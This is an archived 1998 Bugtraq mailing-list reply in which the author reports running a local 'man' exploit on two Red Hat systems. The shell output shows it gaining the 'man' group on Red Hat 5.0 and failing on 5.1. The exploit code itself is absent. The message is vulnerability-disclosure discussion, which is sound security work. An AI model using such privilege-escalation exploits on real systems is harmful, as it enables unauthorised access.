Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1998_4

Bugtraq archives for 4th quarter (Oct-Dec) 1998: Re: Redhat man exploit

Re: Redhat man exploit

John Brahy (jbrahyhades.lb.devry.edu)
Fri, 9 Oct 1998 12:09:07 -0700

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Peter W: "Re: more Netscape 4.07 javascript security"
Previous message: Spikeman: "MacAttack"
In reply to: Neil Trobaugh: "Redhat man exploit"

Redhat 5.0
[jbrahyhades jbrahy]$ uname -a
Linux hades 2.0.31 #1 Sun Nov 9 21:45:23 EST 1997 i586 unknown
[jbrahyhades jbrahy]$ ./MX ls
Using address: 0xbffffd90
bash$ id
uid=648(jbrahy) gid=653(jbrahy) egid=15(man) groups=653(jbrahy)
bash$ man -version
man, version 1.4j

bash$
-----
Redhat 5.1 isn;t
[jbrahyjed jbrahy]$ uname -a
Linux jed 2.0.35 #1 Tue Jul 14 23:56:39 EDT 1998 i586 unknown
[jbrahyjed jbrahy]$
[jbrahyjed jbrahy]$ ./MX ls 2>/dev/null
Using address: 0xbffffda0
[jbrahyjed jbrahy]$ id
uid=420(jbrahy) gid=1134(NNL) groups=1134(NNL)
[jbrahyjed jbrahy]$


-----------

This could be either the kernel or the man version.
but probably the man version IMHO.

John

Next message: Peter W: "Re: more Netscape 4.07 javascript security"
Previous message: Spikeman: "MacAttack"
In reply to: Neil Trobaugh: "Redhat man exploit"